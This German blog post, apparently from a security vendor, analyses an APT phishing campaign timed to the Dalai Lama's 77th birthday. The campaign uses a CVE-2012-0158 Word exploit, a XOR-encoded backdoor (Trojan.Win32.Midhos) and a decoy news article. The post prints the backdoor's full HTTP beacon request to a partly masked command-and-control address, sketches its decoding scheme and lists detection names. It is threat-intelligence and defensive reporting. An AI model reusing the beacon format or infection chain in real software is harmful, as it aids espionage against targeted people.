Ein Geburtstagsgeschenk für den Dalai Lama

Vor kurzem wiesen wir darauf hin, dass der Dalai Lama ein treuer Mac User ist. Während das für Seine Heiligkeit durchaus zutreffend ist, nutzen bisher weitaus nicht alle seine Unterstützer Macs.

Warum das von Bedeutung ist, fragen Sie sich jetzt? Nun, am 6. Juli feiert der Dalai Lama seinen 77. Geburtstag, ein recht markantes Jubiläum also. Es überrascht also nicht, dass die “Dalai Lama Geburtstags-Attacken“ bereits in vollem Gange sind.

Am 3. Juli registrierten wir eine neue APT-Kampagne mit dem Titel “Dalai Lama’s birthday on July 6 to be low-key affair” („Der Geburtstag des Dalai Lama am 6. Juli wird keine große Sache“):

207319846

An diese E-Mail angehängt ist eine .DOC-Datei, die die Sicherheitslücke CVE-2012-0158 ausnutzt – ein sehr übliches Schema für derartige Attacken. (siehe hierzu auch Neue APT-Attacke offenbart technischen Fortschritt in der Exploit-Entwicklung)
In diesem Fall ist das Exploit allerdings auf Windows-basierte Computer ausgelegt.
Der x86-Shellcode in der .DOC-Datei dechiffriert den Hauptkörper des Backdoors in Blocks von 1KB mit einem simplen “xor pos + ror 3”-Codierschlüssel:

207319847

Ist der Hauptkörper des Backdoors entschlüsselt, wird er als“CONIME.EXE” auf die Festplatte transportiert. Die ausführbare Datei wirft dann im weiteren Verlauf eine DLL (CONIME.DLL) und eine Konfigurationsdatei ab (CONIME.INF). Wir detektieren diese zwei Komponenten aktuell als Trojan.Win32.Midhos:

CONIME.dll detektiert als Trojan.Win32.Midhos.fuy
CONIME.exe detektiert als Trojan.Win32.Midhos.fuz

Die DLL setzt die Haupt-Funktionalität des Backdoors durch drei exportierte Funktionen um:

  • CommunicateToClient
  • InstallProgram
  • RunProgram

Wie in anderen Fällen auch, ist die Konfigurationsdatei des Backdoors verschlüsselt:

207319848

Der Verschlüsselungsalgorithmus ist hier anders, es handelt sich um eine Schleife, die einen XOR mit einem variablen Schlüssel durchführt.

207319849

Dechiffriert kann die Konfigurationsdatei des Backdoors wie folgt gelesen werden:

207319850

Die Adresse des Command and Control-Servers (61.178.77.*) stimmt exakt mit der Adresse überein, die in einer früheren, von uns analysierten Attacke verwendet wurde. (Siehe „Neue Variante eines MacOS X Backdoors in APT-Attacken eingesetzt“.)

Der Backdoor versucht sich mit dem C2 via HTTP an Port 1080 zu verbinden, mit einem serverseitigen Modul mit der Bezeichnung WinData{UWXYZ}.Dll:

207319851

Hier die vollständige http-Anfrage:

GET http://61.178.77.*:1080/WinData1158.Dll?HELO-STX-
2*IP_ADDR*COMPUTERNAME*$ HTTP/1.0

Als Reaktion antwortet der Server mit verschlüsselten Paketen, die Befehle an den Backdoor enthalten.

Hat das Exploit Erfolg, wird anstelle dessen ein „gefaktes“ Dokument angezeigt, das einen Artikel aus der indischen Zeitung “The Tribune, Chandigarh” enthält. Der Originalartikel stammt von “Lalit Mohan”:

207319852

Fazit

So prominente Persönlichkeiten wie Tenzin Gyatso, der aktuelle Dalai Lama, sind ständige Zielscheiben für APT-Attacken. Mit dem 77. Geburtstag des Dalai Lama am 6. Juli erwarten wir eine Zunahme derartiger Angriffe.

In den letzten Monaten wurden uns fast 500 Vorfälle mit Trojan.Win32.Midhos gemeldet – eine Backdoor-Familie, die von diesen speziellen APT-Angreifern verwendet wird.

207319853

Die überwiegende Mehrheit der Opfer befindet sich in den USA, Italien, Kanada, dem Vereinigten Königreich und Deutschland.

207319854

In den letzten Monaten haben wir gezeigt, dass viele dieser APT-Attacken (Advanced Persistent Threat) gar nicht unbedingt so “advanced”, also hochentwickelt sind. In vielen Fällen sind sie auch gar nicht so “persistent”, also andauernd – sie werden sehr schnell von Antiviren-Produkten entdeckt und von den Systemen entfernt.

Aber eines sind diese Angriffe ganz sicher, nämlich insistent – also hartnäckig.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.